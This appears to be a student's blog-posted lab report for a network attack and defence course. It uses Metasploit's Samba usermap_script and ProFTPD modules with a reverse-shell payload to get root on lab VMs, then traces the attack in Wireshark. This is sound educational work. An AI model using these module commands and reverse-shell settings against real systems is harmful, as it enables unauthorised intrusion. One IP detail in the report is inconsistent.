20232807 2023-2024-2 《网络攻防实践》实践七报告

一、实验内容

(1)使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:

①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
④设置渗透攻击参数(RHOST,LHOST,TARGET等);
⑤执行渗透攻击;
⑥查看是否正确得到远程Shell,并查看获得的权限。

(2)实践作业:攻防对抗实践

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。

防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

二、实验过程

1、使用Metasploit进行Linux远程渗透攻击

使用kali攻击机(192.168.200.4)和Metaspl0itable靶机(192.168.200.123)
在kali中输入msfconsole打开metasploit工具
在这里插入图片描述

然后使用search命令搜索usermap_script渗透攻击模块
在这里插入图片描述
输入use exploit/multi/samba/usermap_script命令使用该模块
在这里插入图片描述
输入show payloads查看攻击载荷
在这里插入图片描述

选择第二十个载荷,输入set payload cmd/unix/reverse或者set payload 20
在这里插入图片描述
在这里插入图片描述
输入show options查看参数
在这里插入图片描述
设置参数,set LHOST 192.168.200.4、set RHOST 192.168.200.123,再输入show options 查看更改后的参数
在这里插入图片描述
输入expolit进行攻击
在这里插入图片描述
再输入ifconfig查看ip地址,发现已变成靶机的ip地址,证明已经成功进入靶机
在这里插入图片描述
再输入whoami,查看权限,发现获得root权限
在这里插入图片描述

2、实践作业:攻防对抗实践

①攻击实验
攻击机kali(20232807张哲):192.168.1.108
靶机Ubuntu(20232803吴锦龙):192.168.1.111
使用sudo nmap -sv 192.168.1.111对靶机进行漏洞检测
在这里插入图片描述

发现21号端口上是ProFTPD 1.3.1版本的ftp服务
在这里插入图片描述
输入msfconsole打开metasploit服务
在这里插入图片描述

再通过search ProFTPD搜索有关模块
在这里插入图片描述
输入use exploit/linux/ftp/proftp_sreplace
在这里插入图片描述
输入show payloads查看攻击载荷
在这里插入图片描述
输入set payload cmd/unix/reverse,选择一个载荷
在这里插入图片描述

再输入show options查看参数配置

输入set RHOST 192.168.1.111,设置RHOST为靶机ip地址
输入set LHOST 192.168.1.108,设置LHOST为攻击机ip地址
在这里插入图片描述

输入show options查看是否配置成功,再RHOST处显示192.168.1.109,表明配置成功
在这里插入图片描述

输入exploit进行攻击
在这里插入图片描述

输入ifconfig,发现ip地址已变为靶机地址192.168.1.111
在这里插入图片描述

输入mkdir ZhangZhe命令新建一个文件ZhangZhe

在这里插入图片描述

②防御实验
在进行攻击实验前,打开wireshark,输入ip.addr==192.168.1.108
在这里插入图片描述

跟踪TCP流,发现攻击机对靶机攻击时所进行的操作
在这里插入图片描述

在靶机中进入user,输入ls,发现攻击方所建的ZhangZhe文件夹
在这里插入图片描述

三、学习中遇到的问题及解决

问题:在Ubuntu设置为桥接模式后,发现ip地址仍未发生变化。
解决方案:把原来的虚拟机删去,重新安装新的虚拟机

四、学习感悟

在这次的实验中,我学习到了使用Metasploit进行Linux远程渗透攻击,还进行了攻防对抗实践,更加深入的了解了Linux攻防技术以及分析攻方的攻击过程,这次实践也遇到了一些难题,通过上网查找资料、和同学交流解决了问题,也证明我的技术水平和实践操作能力还有待提高。

  • 22
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值